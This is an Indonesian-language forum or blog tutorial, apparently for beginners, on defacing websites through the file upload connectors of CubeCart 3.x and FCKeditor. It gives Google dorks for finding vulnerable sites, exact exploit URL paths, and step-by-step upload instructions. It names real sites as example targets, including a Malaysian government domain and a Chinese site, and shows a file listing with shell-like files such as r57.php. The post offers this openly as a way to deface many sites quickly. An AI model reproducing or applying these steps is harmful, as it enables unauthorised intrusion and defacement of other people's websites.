Detective-ID - Halo Kali ini ane mau bagi tutorial singkat deface nih , bagus banget buat newbie yang mau belajar deface xixixixix , yuk langsung aja di simak :)
Pendahuluan :
Apa itu deface?
defece : melakukan perubahan pada halaman web pada situs-situs tertentu, yang dilakukan oleh para hacker atau team tertentu dengan gerakan undergroundnya sebagai sebuah cyber gang fight untuk mengganggu informasi yang dimunculkan pada halaman situs yang dimaksud.
Ada banyak cara untuk nge deface web
but karna saya masih newbie.. saya masih dekit tau nya Malu
maaf sebelumnya kalo ini ga berguna.. :)
hanya memberikan apa yang saya tau kepada teman² semua
OK kali ini saya akan memberikan tutor deface singkat
ada dua.. 1 upload *.html dan 1 lgi upload *.txt
jamin 1 jam dapet min 10 site :D
OK langsung aja.. :)
================================================
Autor : ho1onk a.k.a hogyz
email : ho1onk@mail.com
site : http://ho1onk.cz.cc
forum : http://hacker-newbie.org
title : CubeCart v 3.x Upload file Vulnerability
dork : powered by CubeCart v 3.x
================================================
[+] exploit : http://localhost/[pacth]/admin/includes/rte/editor/filemanager/browser/default/connectors/test.html
Ok langsung aja yah..
sesuai judul CubeCart Upload file
buka google
masukkan dork.. terserah mau gimana caranya
salah satu nya adalah
intext:'powered by CubeCart v 3.x'
cari satu per satu,,
nah, kalo udah dapet target kito coba masukin exploit
ne hasil nyaa
Sepp, bisa..
Kita coba upload file *.html
1. pada connector pilih PHP
2. lalu pilih file html yang udah kita siapin.. trz klik Upload
Nah tandanya berhasil ato tidah uploadtan kita gini
Lihat SS berikut
“file uploaded with no errorsâ€
OK, udah berhasil di upload.. tapi file kita dimana ya?
Langsung klik Get folder and files
Kurang lebih seperti ini
----------------------------------------------------------------------------------------------------------------------------------
Code:
----------------------------------------------------------------------------------------------------------------------------------
<Connector command="GetFoldersAndFiles" resourceType="File">
<CurrentFolder path="/" url="/[pacth]/file/"/>
−
<Folders>
<Folder name="test"/>
</Folders>
−
<Files>
<File name="a_asp;_jpg(1).gif" size="53"/>
<File name="a_asp;_jpg.gif" size="53"/>
<File name="fe.php6" size="188"/>
<File name="robtz.html" size="18"/>
<File name="fe.php?" size="188"/>
<File name="fe_php." size="188"/>
<File name="hn(1).txt" size="1"/>
<File name="hn.txt" size="1"/>
<File name="r57.php~" size="108"/>
</Files>
</Connector>
----------------------------------------------------------------------------------------------------------------------------------
Dari data di atas kita bisa lihat file kita ada di “url/[pacth]/file/robtz.htmlâ€
Example : http://site.gov.my/fileupload/file/robtz.html
bakal keliatan seperti SS berikut..
Nah sekarang coba buka di halamna baru url tadi..
Itu lah halaman file yang kita upload tadi
seep..
kita berhasil masukin file deface an..
untuk shell sepertinya bisa dengan menyisipkan script ke dalam file tertentu seperti sudah pernah di jelaskan kk Alecs..
gimana? gampang bukan?
heheheh
=====================================
mau yang lebih gampang lagi?
OK boleh..
ne saya kasih..lagi..
Tutorial singkat deface with *.txt
================================================
Autor : ho1onk a.k.a hogyz
email : ho1onk@mail.com
site : http://ho1onk.cz.cc
forum : http://hacker-newbie.org
title : upload *.txt file Vulnerability
dork : filemanager/connectors
================================================
[+] exploit
http://site/[patch]/fckeditor/editor/filemanager/connectors/test.html
OK kali ini saya akan memberikan tutorial deface paling gampang yang baru saya temukan di tanggal 5 janury 2011 ïŠ
Sebenranya banyak cara deface.. apa lagi php nuke sangat banyak bug nya
Ga ada SS karma ini sangat gampang.. ïŠ
“Just Defaceâ€
=======================
[+] langkah pertama [+]
=======================
Langkah pertama yang hasrus kita lakukan seperti biasa juga..
Nnya dulu sama si google
Dork..
Inurl:Masukin dork
Inurl: fckeditor/editor/
Inurl:filemanager/connectors/ site:.my
inurl:connectors/uploadtest.html site:.my :P
udah blom?
Heheh
OK seep.. lanjut..
Buka site nya..
Kali ini saya coba site
http://www.slfc.net.cn
=======================
[+] langkah ke dua [+]
=======================
OK lanjut..
Masukin exploitnya
Jadinya kayak gini
http://www.slfc.net.cn/php/FCKeditor/editor/filemanager/browser/default/connectors/test.html
SS
=======================
[+] langkah ke tiga [+]
=======================
Nah, kalo udah muncul yang kayak gitu udah pada tau kan..?
Sama seperti tutor ecommerce
OK, pilih php,,
Pilih file defacean kita
Upload..
Kalo keluar kotak dialog bertuliskan “file uploade with no errors†berrti berhasil
========================
[+] langkah ke empat [+]
========================
Cari file uploadtan kita..
Klik get folder and files..
untuk contoh ini ada di
"/php/userfiles/file/"
jadinya
demo: http://localshost/php/userfiles/file/[file kamu]
ex : http://www.slfc.net.cn/php/userfiles/file/hn.txt
Nah.. sekarang lihat url file kita tadi,, seep..
But just deface..
No shell!
html juga ga bisa :)
hehhe kalo mau yang shel bisa pake ini..
out side : tutor deface joomla wiht shell
NB: Mungkin ini masih bisa di kembangkkan lagi.. untuk upload shell dengan memanipulasi file.. tapi saya belum berhasil karna saya masih newbie
Thx For HN And Hogyz
-----Semoga Bermanfaat-----